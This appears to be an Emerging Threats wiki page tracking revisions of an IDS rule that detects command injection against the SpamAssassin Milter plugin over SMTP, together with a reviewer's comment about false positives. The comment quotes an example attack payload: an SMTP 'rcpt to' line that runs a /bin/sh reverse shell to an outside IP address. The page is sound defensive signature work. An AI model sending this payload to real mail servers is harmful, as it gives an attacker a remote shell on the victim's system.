#alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible SpamAssassin? Milter Plugin Remote Arbitrary Command Injection Attempt"; flow:established,to_server; content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|"; distance:0; reference:url,www.securityfocus.com/bid/38578; reference:url,seclists.org/fulldisclosure/2010/Mar/140; reference:url,doc.emergingthreats.net/2010877; classtype:attempted-user; sid:2010877; rev:3; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Added 2017-10-30 18:17:38 UTC


#alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible SpamAssassin? Milter Plugin Remote Arbitrary Command Injection Attempt"; flow:established,to_server; content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|"; distance:0; reference:url,www.securityfocus.com/bid/38578; reference:url,seclists.org/fulldisclosure/2010/Mar/140; reference:url,doc.emergingthreats.net/2010877; classtype:attempted-user; sid:2010877; rev:3; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Added 2017-10-30 16:39:46 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible SpamAssassin? Milter Plugin Remote Arbitrary Command Injection Attempt"; flow:established,to_server; content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|"; distance:0; reference:url,www.securityfocus.com/bid/38578; reference:url,seclists.org/fulldisclosure/2010/Mar/140; reference:url,doc.emergingthreats.net/2010877; classtype:attempted-user; sid:2010877; rev:3; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Added 2017-08-07 21:04:01 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible SpamAssassin? Milter Plugin Remote Arbitrary Command Injection Attempt"; flow:established,to_server; content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|"; distance:0; reference:url,www.securityfocus.com/bid/38578; reference:url,seclists.org/fulldisclosure/2010/Mar/140; reference:url,doc.emergingthreats.net/2010877; classtype:attempted-user; sid:2010877; rev:3;)

Added 2011-10-12 19:30:48 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible SpamAssassin? Milter Plugin Remote Arbitrary Command Injection Attempt"; flow:established,to_server; content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|"; distance:0; classtype:attempted-user; reference:url,www.securityfocus.com/bid/38578; reference:url,seclists.org/fulldisclosure/2010/Mar/140; reference:url,doc.emergingthreats.net/2010877; sid:2010877; rev:3;)

Added 2011-09-14 22:43:57 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible SpamAssassin? Milter Plugin Remote Arbitrary Command Injection Attempt"; flow:established,to_server; content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|"; distance:0; classtype:attempted-user; reference:url,www.securityfocus.com/bid/38578; reference:url,seclists.org/fulldisclosure/2010/Mar/140; reference:url,doc.emergingthreats.net/2010877; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Spamassassin; sid:2010877; rev:3;)

Added 2011-02-04 17:30:33 UTC

I think this rule is prone to FPs due to it's generalization. An example packet payload:

rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"

I think the rule should look for the "rcpt to" string. Also, maybe just include the binary for + and " instead of escaping.

Example addition: content:"rcpt|20|to|3A|";

And possibly change: +|3A|\"|7C| To: |2B|3A|22|7C|

-- JohnMeyer - 10 Feb 2011


alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible SpamAssassin? Milter Plugin Remote Arbitrary Command Injection Attempt"; flow:established,to_server; content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|"; distance:0; classtype:attempted-user; reference:url,www.securityfocus.com/bid/38578; reference:url,seclists.org/fulldisclosure/2010/Mar/140; reference:url,doc.emergingthreats.net/2010877; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Spamassassin; sid:2010877; rev:3;)

Added 2010-03-08 14:15:49 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible SpamAssassin? Milter Plugin Remote Arbitrary Command Injection Attempt"; flow:established,to_server; content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|"; distance:0; classtype:attempted-user; reference:url,www.securityfocus.com/bid/38578; reference:url,seclists.org/fulldisclosure/2010/Mar/140; reference:url,doc.emergingthreats.net/2010877; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Spamassassin; sid:2010877; rev:3;)

Added 2010-03-08 14:15:49 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible SpamAssassin? Milter Plugin Remote Arbitrary Command Injection Attempt"; flow:established,to_server; content:"to|3A|"; nocase; content:"root+|3A|\"|7C|"; nocase; within:15; classtype:attempted-user; reference:url,www.securityfocus.com/bid/38578; reference:url,seclists.org/fulldisclosure/2010/Mar/140; reference:url,doc.emergingthreats.net/2010877; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Spamassassin; sid:2010877; rev:2;)

Added 2010-03-08 13:53:45 UTC


Topic revision: r2 - 2011-02-10 - JohnMeyer
 
This site is powered by the TWiki collaboration platform Powered by Perl This site is powered by the TWiki collaboration platformCopyright © Emerging Threats